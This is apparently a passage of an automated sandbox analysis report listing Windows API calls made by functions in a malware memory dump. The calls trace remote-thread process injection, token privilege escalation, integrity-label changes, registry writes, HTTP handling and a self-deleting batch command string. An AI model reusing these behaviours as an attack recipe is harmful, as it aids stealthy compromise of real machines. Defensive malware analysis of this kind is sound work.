Part of subcall function 001ADD09: SelectObject.GDI32(00000000,00000000), ref: 001ADF4D
Part of subcall function 001ADD09: ReleaseDC.USER32(00000000,00000001), ref: 001ADF65

GetShellWindow.USER32 ref: 001A7338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 001A736B

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 001A73CD
CloseHandle.KERNEL32(?), ref: 001A73DD
CloseHandle.KERNEL32(?), ref: 001A73E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 001A73F2

Part of subcall function 001AD4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,001AE1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 001AD714
Part of subcall function 001AD4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001AD72F
Part of subcall function 001AD4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 001AD7C1
Part of subcall function 001AD4B4: GetSystemMetrics.USER32(00000017), ref: 001AD8DB
Part of subcall function 001AD4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 001ADC67

Part of subcall function 001ADF74: DeleteObject.GDI32(00000000), ref: 001ADF87
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADF97
Part of subcall function 001ADF74: TlsFree.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFA2
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADFB0
Part of subcall function 001ADF74: UnmapViewOfFile.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFBA
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADFC7
Part of subcall function 001ADF74: SelectObject.GDI32(00000000,00000000), ref: 001ADFE1
Part of subcall function 001ADF74: DeleteObject.GDI32(00000000), ref: 001ADFF2
Part of subcall function 001ADF74: DeleteDC.GDI32(00000000), ref: 001ADFFF
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001AE010
Part of subcall function 001ADF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001AE01F
Part of subcall function 001ADF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 001AE038

Part of subcall function 001B65B7: recv.WS2_32(?,?,00000400,00000000), ref: 001B6600
Part of subcall function 001B65B7: #19.WS2_32(?,?,00000000,00000000), ref: 001B661A
Part of subcall function 001B65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 001B6657

Part of subcall function 001B675E: shutdown.WS2_32(?,00000002), ref: 001B6766
Part of subcall function 001B675E: #3.WS2_32(?), ref: 001B676D

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 001B67CC

Part of subcall function 001B6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 001B67A7

Part of subcall function 001B6403: socket.WS2_32(?,00000001,00000006), ref: 001B640C
Part of subcall function 001B6403: connect.WS2_32(00000000,?,-0000001D), ref: 001B642C
Part of subcall function 001B6403: #3.WS2_32(00000000), ref: 001B6437

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BA6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 001BA594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 001BA5F4

Part of subcall function 001B1049: EnterCriticalSection.KERNEL32(001C2AC8), ref: 001B1064
Part of subcall function 001B1049: LeaveCriticalSection.KERNEL32(001C2AC8), ref: 001B10E7
Part of subcall function 001B1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 001B11B2
Part of subcall function 001B1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 001B13EC

SetLastError.KERNEL32(00002F78), ref: 001BA6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 001BA762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 001BA77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 001BA795
EnterCriticalSection.KERNEL32(001C3F24), ref: 001BA79D
LeaveCriticalSection.KERNEL32(001C3F24,?), ref: 001BA853

Part of subcall function 001B5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 001B506A
Part of subcall function 001B5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 001B508C
Part of subcall function 001B5048: InternetCloseHandle.WININET(?), ref: 001B5094

Part of subcall function 001B1C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 001B1C81
Part of subcall function 001B1C3C: CloseHandle.KERNEL32(?), ref: 001B1C9A

EnterCriticalSection.KERNEL32(001C3F24), ref: 001BA87A
LeaveCriticalSection.KERNEL32(001C3F24,?), ref: 001BA8BA

Part of subcall function 001B9C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001C3F24,001BA893,?), ref: 001B9CB1

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B31CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001B31ED
Process32FirstW.KERNEL32(000001E6,?), ref: 001B3216

Part of subcall function 001B245B: CreateMutexW.KERNEL32(001C2C30,00000001,?,001C2E70,76C605D7,?,00000002,?,76C605D7), ref: 001B24A3
Part of subcall function 001B245B: GetLastError.KERNEL32 ref: 001B24AF
Part of subcall function 001B245B: CloseHandle.KERNEL32(00000000), ref: 001B24BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 001B3271
CloseHandle.KERNEL32(?), ref: 001B330E

Part of subcall function 001B49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,001B2326,000000FF,001C2C08,?,?,00000000), ref: 001B49E2
Part of subcall function 001B49D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,001B2326,000000FF,001C2C08), ref: 001B4A0E
Part of subcall function 001B49D2: CloseHandle.KERNEL32(?), ref: 001B4A23

CloseHandle.KERNEL32(00000000), ref: 001B328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 001B32A1

Part of subcall function 001B3346: HeapAlloc.KERNEL32(00000008,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?,?), ref: 001B3368
Part of subcall function 001B3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?), ref: 001B3379

Part of subcall function 001B3048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 001B3157
Part of subcall function 001B3048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00375903,00000000,00000000,00000000), ref: 001B3185
Part of subcall function 001B3048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 001B3198
Part of subcall function 001B3048: CloseHandle.KERNEL32(?), ref: 001B31A1
Part of subcall function 001B3048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 001B31B5
Part of subcall function 001B3048: CloseHandle.KERNEL32(00000000), ref: 001B31BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 001B331A
CloseHandle.KERNEL32(000001E6), ref: 001B332B

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AB11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001AB130
ReleaseMutex.KERNEL32(?), ref: 001AB14F
GetWindowRect.USER32(?,?), ref: 001AB15C
IsRectEmpty.USER32(?), ref: 001AB1E0
GetWindowLongW.USER32(?,000000F0), ref: 001AB1EF
GetParent.USER32(?), ref: 001AB205
MapWindowPoints.USER32(00000000,00000000), ref: 001AB20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 001AB232

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B14C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 001B433F: CharLowerA.USER32(00000000), ref: 001B4420
Part of subcall function 001B433F: CharLowerA.USER32(?), ref: 001B442D

Part of subcall function 001B3346: HeapAlloc.KERNEL32(00000008,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?,?), ref: 001B3368
Part of subcall function 001B3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?), ref: 001B3379

Part of subcall function 001B7FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 001B8104

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

InternetCrackUrlA.WININET ref: 001B17AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 001B17CA

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

LeaveCriticalSection.KERNEL32(001C2AC8,?,?), ref: 001B194D

Part of subcall function 001B4660: CryptAcquireContextW.ADVAPI32(001B8C87,00000000,00000000,00000001,F0000040,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B4679
Part of subcall function 001B4660: CryptCreateHash.ADVAPI32(001B8C87,00008003,00000000,00000000,00000030,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B4691
Part of subcall function 001B4660: CryptHashData.ADVAPI32(00000030,00000010,001B8C87,00000000,?,001B8C87), ref: 001B46AD
Part of subcall function 001B4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,001B8C87), ref: 001B46C5
Part of subcall function 001B4660: CryptDestroyHash.ADVAPI32(00000030,?,001B8C87), ref: 001B46DC
Part of subcall function 001B4660: CryptReleaseContext.ADVAPI32(001B8C87,00000000,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B46E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 001B18E4

Part of subcall function 001B763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,001B9EAB,?,?,00000004), ref: 001B7658
Part of subcall function 001B763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,001B9EAB,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7672
Part of subcall function 001B763A: RegCloseKey.ADVAPI32(00000004,?,?,001B9EAB,?,?,00000004,?,00000004), ref: 001B7681

EnterCriticalSection.KERNEL32(001C2AC8), ref: 001B1910

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

?*, xrefs: 001B14FD

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A63F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 001B2507: CreateMutexW.KERNEL32(001C2C30,00000000,?,?,?,?,?), ref: 001B2528

Part of subcall function 001B262D: WaitForSingleObject.KERNEL32(00000000,001ABB83), ref: 001B2635

Part of subcall function 001A5ECF: PathRemoveFileSpecW.SHLWAPI(001C25D0), ref: 001A5F07
Part of subcall function 001A5ECF: PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 001A5F23
Part of subcall function 001A5ECF: GetFileAttributesW.KERNEL32(001C23C8,001C25D0,001C25D0,00000000,00020000,001A69C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 001A5F46

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000330,?,?,00000102), ref: 001A6538
GetFileAttributesW.KERNEL32(001C23C8), ref: 001A654B
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 001A6571
CloseHandle.KERNEL32(00000000), ref: 001A658F
lstrcmpiW.KERNEL32(?,?), ref: 001A65BF
MoveFileExW.KERNEL32(?,?,0000000B), ref: 001A65E7

Part of subcall function 001A6BD7: RegOpenKeyExW.ADVAPI32(80000001,001C27F0,00000000,00000001,?,?), ref: 001A6C00

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001A6010: GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 001A610F
Part of subcall function 001A6010: GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 001A6162
Part of subcall function 001A6010: GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 001A61A4
Part of subcall function 001A6010: GetUserNameExW.SECUR32(00000002,?,00000104), ref: 001A61E6

Part of subcall function 001A680D: WaitForSingleObject.KERNEL32(?,00001388), ref: 001A685A
Part of subcall function 001A680D: Sleep.KERNEL32(00001388,?,?,?,00000000,?,?,-78D0C214,00000002), ref: 001A6869

Part of subcall function 001B9354: FlushFileBuffers.KERNEL32(00000000), ref: 001B9360
Part of subcall function 001B9354: CloseHandle.KERNEL32(?), ref: 001B9368

Part of subcall function 001B8716: SetFileAttributesW.KERNEL32(00000080,00000080,001BB4CD,?), ref: 001B871F
Part of subcall function 001B8716: DeleteFileW.KERNEL32(?), ref: 001B8729

Part of subcall function 001B86EF: GetFileSizeEx.KERNEL32(001B925C,001B925C,?,?,?,001B925C,00000000), ref: 001B86FB

WaitForSingleObject.KERNEL32(00007530,?), ref: 001A668B

Part of subcall function 001B6B8E: ReleaseMutex.KERNEL32(00000000,001B3021,?,?,?), ref: 001B6B92

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B8AE4, Relevance: 10.6, APIs: 7, Instructions: 109

APIs

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001B8B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B8B4A

Part of subcall function 001B8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 001B8B94
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 001B8BC1
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?), ref: 001B8BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 001B8C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 001B8C31

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 001B8737: GetTempPathW.KERNEL32(000000F6,?), ref: 001B874E

CharToOemW.USER32(?,?), ref: 001B4EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 001B4F2F

Part of subcall function 001B8716: SetFileAttributesW.KERNEL32(00000080,00000080,001BB4CD,?), ref: 001B871F
Part of subcall function 001B8716: DeleteFileW.KERNEL32(?), ref: 001B8729

Part of subcall function 001B856B: CreateFileW.KERNEL32(001B4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 001B8585
Part of subcall function 001B856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001B85A8
Part of subcall function 001B856B: CloseHandle.KERNEL32(00000000), ref: 001B85B5

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Strings

ComSpec, xrefs: 001B4F2A
@echo off%sdel /F "%s", xrefs: 001B4EBE
bat, xrefs: 001B4E8B
/c "%s", xrefs: 001B4F01

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 001B797D
PathAddBackslashW.SHLWAPI(?), ref: 001B7994
PathRemoveBackslashW.SHLWAPI(?), ref: 001B79A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 001B79B2
PathAddBackslashW.SHLWAPI(?), ref: 001B79C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 001B79D2
CLSIDFromString.OLE32(?,?), ref: 001B79EC

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B78D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 001B78FD

Part of subcall function 001B773A: CharUpperW.USER32(00000000), ref: 001B785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 001B792F
RegCloseKey.ADVAPI32(?), ref: 001B7938
RegCloseKey.ADVAPI32(?), ref: 001B7952

Strings

SOFTWARE\Microsoft, xrefs: 001B78F0
d, xrefs: 001B7943

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,001BC9A1,00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,001BC9A1,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4AB0
LookupPrivilegeValueW.ADVAPI32(00000000,001BC9A1,?), ref: 001B4AD4
AdjustTokenPrivileges.ADVAPI32(001BC9A1,00000000,00000001,00000000,00000000,00000000), ref: 001B4AE9
GetLastError.KERNEL32 ref: 001B4AF3
CloseHandle.KERNEL32(001BC9A1), ref: 001B4B02

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B6A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 001B4A87: GetCurrentThread.KERNEL32(00000020,00000000,001BC9A1,00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A97
Part of subcall function 001B4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A9E
Part of subcall function 001B4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,001BC9A1,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4AB0
Part of subcall function 001B4A87: LookupPrivilegeValueW.ADVAPI32(00000000,001BC9A1,?), ref: 001B4AD4
Part of subcall function 001B4A87: AdjustTokenPrivileges.ADVAPI32(001BC9A1,00000000,00000001,00000000,00000000,00000000), ref: 001B4AE9
Part of subcall function 001B4A87: GetLastError.KERNEL32 ref: 001B4AF3
Part of subcall function 001B4A87: CloseHandle.KERNEL32(001BC9A1), ref: 001B4B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 001B6A5B
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 001B6A77
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 001B6A8E
LocalFree.KERNEL32(00000000), ref: 001B6A9D

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 001B6A56
SeSecurityPrivilege, xrefs: 001B6A43

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AB31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 001AB345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 001AB370
PostMessageW.USER32(?,00000020,?,00000000), ref: 001AB3B2

Part of subcall function 001AB23D: GetTickCount.KERNEL32 ref: 001AB2A3
Part of subcall function 001AB23D: GetClassLongW.USER32(?,000000E6), ref: 001AB2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 001AB448
PostMessageW.USER32(?,00000112,?,?), ref: 001AB49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 001AB4DA

Part of subcall function 001AB0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001AB0B3
Part of subcall function 001AB0AD: ReleaseMutex.KERNEL32(?), ref: 001AB0E7
Part of subcall function 001AB0AD: IsWindow.USER32(?), ref: 001AB0EE
Part of subcall function 001AB0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 001AB108
Part of subcall function 001AB0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 001AB110

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A9694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 001A9709
StrStrIW.SHLWAPI(?,?), ref: 001A9796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 001A97BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 001A97DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 001A980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 001A982D

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BA3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(001C3F24), ref: 001BA3C2
LeaveCriticalSection.KERNEL32(001C3F24), ref: 001BA425

Part of subcall function 001BA298: ResetEvent.KERNEL32(?), ref: 001BA2A6
Part of subcall function 001BA298: InternetSetStatusCallbackW.WININET(?,001BA24F), ref: 001BA2DB
Part of subcall function 001BA298: InternetReadFileExA.WININET ref: 001BA31B
Part of subcall function 001BA298: GetLastError.KERNEL32 ref: 001BA325
Part of subcall function 001BA298: InternetSetStatusCallbackW.WININET(?,?), ref: 001BA389

EnterCriticalSection.KERNEL32(001C3F24), ref: 001BA442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 001BA4C6

Part of subcall function 001B856B: CreateFileW.KERNEL32(001B4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 001B8585
Part of subcall function 001B856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001B85A8
Part of subcall function 001B856B: CloseHandle.KERNEL32(00000000), ref: 001B85B5

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 001B5505
Part of subcall function 001B54F1: GetLastError.KERNEL32 ref: 001B550F
Part of subcall function 001B54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 001B552F

Part of subcall function 001B14C3: InternetCrackUrlA.WININET ref: 001B17AC
Part of subcall function 001B14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 001B17CA
Part of subcall function 001B14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 001B18E4
Part of subcall function 001B14C3: EnterCriticalSection.KERNEL32(001C2AC8), ref: 001B1910
Part of subcall function 001B14C3: LeaveCriticalSection.KERNEL32(001C2AC8,?,?), ref: 001B194D

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

SetLastError.KERNEL32(00002EE4), ref: 001BA51C
LeaveCriticalSection.KERNEL32(001C3F24), ref: 001BA585

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 001A92D4
StrStrIW.SHLWAPI(?,?), ref: 001A935C
StrStrIW.SHLWAPI(?,?), ref: 001A936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 001A9389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 001A93A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 001A93C1

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B1049, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(001C2AC8), ref: 001B1064
LeaveCriticalSection.KERNEL32(001C2AC8), ref: 001B10E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 001B11B2

Part of subcall function 001BAE54: EnterCriticalSection.KERNEL32(001C3FB4,?,001B11CF,?), ref: 001BAE5B
Part of subcall function 001BAE54: LeaveCriticalSection.KERNEL32(001C3FB4), ref: 001BAE90

Part of subcall function 001BAE9A: EnterCriticalSection.KERNEL32(001C3FB4,?,00000000,001B13AE,00000000), ref: 001BAEA6
Part of subcall function 001BAE9A: LeaveCriticalSection.KERNEL32(001C3FB4), ref: 001BAEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 001B13EC

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Part of subcall function 001B0AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0C73
Part of subcall function 001B0AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0C93
Part of subcall function 001B0AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0CA6
